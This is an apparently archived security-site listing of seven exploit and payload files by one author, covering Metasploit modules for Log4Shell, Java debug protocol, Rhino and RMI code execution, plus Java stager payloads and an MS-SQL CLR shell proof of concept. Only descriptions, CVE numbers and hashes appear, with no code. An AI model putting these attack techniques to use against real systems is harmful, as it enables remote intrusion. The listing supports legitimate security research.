what you don't know can hurt you

Register | Login

FilesNewsUsersAuthors

Home Files News &[SERVICES_TAB]About Contact Add New

Showing 1 - 7 of 7

Files from Michael Schierl

Log4Shell HTTP Header Injection

Posted Jan 12, 2022

Authored by sinn3r, Michael Schierl, Spencer McIntyre, juan vazquez | Site metasploit.com

This Metasploit module will exploit an HTTP end point with the Log4Shell vulnerability by injecting a format message that will trigger an LDAP connection to Metasploit and load a payload. The Automatic target delivers a Java payload using remote class loading. This requires Metasploit to run an HTTP server in addition to the LDAP server that the target can connect to. The targeted application must have the trusted code base option enabled for this technique to work. The non-Automatic targets deliver a payload via a serialized Java object. This does not require Metasploit to run an HTTP server and instead leverages the LDAP server to deliver the serialized object. The target application in this case must be compatible with the user-specified JAVA_GADGET_CHAIN option.

tags | exploit, java, remote, web

advisories | CVE-2021-44228

SHA-256 | fb881ade3573c4c3970acc27f51ba1d3ac1aaff25446ea8e525ce3aca4d0ca4d

Download | Favorite | View

Java Debug Wire Protocol Remote Code Execution

Posted Jun 16, 2014

Authored by Michael Schierl, Christophe Alladoum, Julian Vilas | Site metasploit.com

This Metasploit module abuses exposed Java Debug Wire Protocol services in order to execute arbitrary Java code remotely. It just abuses the protocol features, since no authentication is required if the service is enabled.

tags | exploit, java, arbitrary, protocol

advisories | OSVDB-96066

SHA-256 | 1e8b55ac023effc278ba81e4b21d999d5de6a928c79485271727ac75c78a4964

Download | Favorite | View

Java Applet Rhino Script Engine Remote Code Execution

Posted Nov 30, 2011

Authored by sinn3r, Michael Schierl, juan vazquez, Edward D. Teach | Site metasploit.com

This Metasploit module exploits a vulnerability in the Rhino Script Engine that can be used by a Java Applet to run arbitrary Java code outside of the sandbox. The vulnerability affects version 7 and version 6 update 27 and earlier, and should work on any browser that supports Java (for example: IE, Firefox, Google Chrome, etc).

tags | exploit, java, arbitrary

advisories | CVE-2011-3544, OSVDB-76500

SHA-256 | d91e779ec520d6b5000796fbb5510410cdd34ecb929017aa6bdbbf0c838eed04

Download | Favorite | View

Java RMI Server Insecure Default Configuration Java Code Execution

Posted Jul 16, 2011

Authored by Michael Schierl | Site metasploit.com

This Metasploit module takes advantage of the default configuration of the RMI Registry and RMI Activation services, which allow loading classes from any remote (HTTP) URL. As it invokes a method in the RMI Distributed Garbage Collector which is available via every RMI endpoint, it can be used against both rmiregistry and rmid, and against most other (custom) RMI endpoints as well. Note that it does not work against Java Management Extension (JMX) ports since those do not support remote class loading, unless another RMI endpoint is active in the same Java process. RMI method calls do not support or require any sort of authentication.

tags | exploit, java, remote, web, registry

SHA-256 | 74cc3c759347106de31d2f7d447682b88481649a9cdcb47556ef3dc90a7223ae

Download | Favorite | View

J2EEPayload 0.1

Posted Dec 13, 2010

Authored by Michael Schierl | Site schierlm.users.sourceforge.net

This archive contains a collection of WAR and EAR compatible stagers that use a variety of communication methods to communicate back to the attacker - even if the only open port is the HTTP/JNDI port, or even if no incoming ports are open but the victim can call back (which can be tricky as usually WARs and EARs are initialized on demand).

tags | java, web

SHA-256 | e0adf72b3398c73749efe6bac7d251e6948e7d500a2ba499bf1a5c34ac8e26fc

Download | Favorite | View

MS-SQL CLR Stored Procedure Proof Of Concept

Posted Oct 11, 2010

Authored by Michael Schierl

Microsoft SQL Server supports so called CLR Stored Procedures which are written in a .NET language and are run directly inside MS SQL Server. If an hijacked account has appropriate permissions, it can be used to run a native payload (inject native code into a new thread) or to tunnel a TCP connection or a shell via the SQL port (needed if the database server is properly firewalled). They can also be combined to tunnel a reverse_tcp payload. Additional permissions, like xp_cmdshell, are not required. This file is a proof of concept that demonstrates this ability.

tags | exploit, shell, tcp, proof of concept

SHA-256 | b402c616b5be94e40d281a86dd3349dc0c78b5d4578e9d551c39743f9a054e27

Download | Favorite | View

JavaPayload - Platform Independent Java Stager Payloads

Posted Apr 19, 2010

Authored by Michael Schierl | Site schierlm.users.sourceforge.net

This archive contains a collection of pure Java payloads, from simple Shell and UpExec payloads (which need - to some degree - platform dependent parameters), to a JSh ("Java Shell") payload that supports an interactive shell to query system properties, run applications, open TCP connections, navigate the filesystem and read/write text files. Basic job control enables to run more than one command or TCP session via a single exploited session. These payloads are modular, consisting of three parts: loaders, stagers and stages. Loaders, stagers and stages can be combined arbitrarily, and the stages and stagers can also be used to integrate them into other exploit frameworks like Metasploit (if you are more Ruby-literate than me). There are also examples included how to call these payloads from standalone applications, signed Java applets, OpenOffice macros or via JDWP debug connections.

tags | java, shell, tcp, ruby

SHA-256 | 747a1606b26df9100754057d92a18c72898b1aac62e7ff7f66444ab2423ae003

Download | Favorite | View